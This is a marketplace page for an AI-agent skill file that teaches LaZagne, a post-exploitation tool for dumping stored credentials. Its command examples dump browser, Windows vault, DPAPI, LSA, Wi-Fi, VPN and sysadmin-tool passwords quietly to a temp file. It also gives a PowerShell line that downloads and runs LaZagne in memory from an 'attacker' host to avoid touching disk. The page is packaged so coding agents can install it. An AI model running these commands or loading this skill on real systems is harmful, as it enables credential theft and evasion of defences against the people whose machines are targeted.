aeondave/lazagne
offensive-tools/windows/lazagne/SKILL.md
Auth/lab ref: LaZagne secret-exposure audit; browser/app/Wi-Fi/Git artifacts, user/admin context, defensive validation evidence.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill lazagneInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 9, 2026, 3:58 AM160.5s1 file scanned
SKILL.md
- name:
- lazagne
- description:
- Auth/lab ref: LaZagne secret-exposure audit; browser/app/Wi-Fi/Git artifacts, user/admin context, defensive validation evidence.
- license:
- MIT
- compatibility:
- Windows primary; Linux/macOS support; privilege scope affects artifact visibility.
- author:
- AeonDave
- version:
- 1.0
LaZagne
Post-exploitation credential recovery from installed applications — browsers, mail, Git, databases, WiFi, and more.
Quick Start
# Dump everything
lazagne.exe all
# Browsers only
lazagne.exe browsers
# Specific module
lazagne.exe windows
Module Categories
| Category | What's Covered |
|----------|----------------|
| browsers | Chrome, Firefox, Edge, Opera, IE, Brave |
| windows | Credential Manager, DPAPI, LSA secrets, Vault |
| mails | Thunderbird, Outlook, Outlook Express |
| databases | MySQL, PostgreSQL, MSSQL, Oracle |
| network | WiFi passwords, VPN (Cisco, OpenVPN, WireGuard) |
| memory | KeePass, mRemoteNG, Pidgin |
| git | Git credentials |
| chats | Skype |
| sysadmin | WinSCP, PuTTY, FileZilla, mRemoteNG, TeamViewer |
Core Flags
| Flag | Description |
|------|-------------|
| all | Run all modules |
| <module> | Run specific module category |
| -oJ <file> | JSON output |
| -oN <file> | Text output |
| -oA <dir> | All output formats to directory |
| -v | Verbose |
| -vv | Debug |
| -quiet | No banner |
Common Workflows
# Full credential dump to JSON
lazagne.exe all -oJ C:\Windows\Temp\creds.json -quiet
# Browser creds only
lazagne.exe browsers -v
# Sysadmin tool creds (WinSCP, FileZilla, etc.)
lazagne.exe sysadmin
# WiFi passwords
lazagne.exe network
# Run from PowerShell (in-memory if needed)
# Download and run without dropping to disk:
IEX(New-Object Net.WebClient).DownloadString('http://attacker/LaZagne.py')
Output Example
[+] Password found !!!
URL: https://corp-mail.example.com
Login: [email protected]
Password: Summer2024!
Resources
| File | When to load |
|------|--------------|
| references/credential-sources.md | Module details, DPAPI decryption, browser DB paths, output parsing |
Structuring This Skill
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026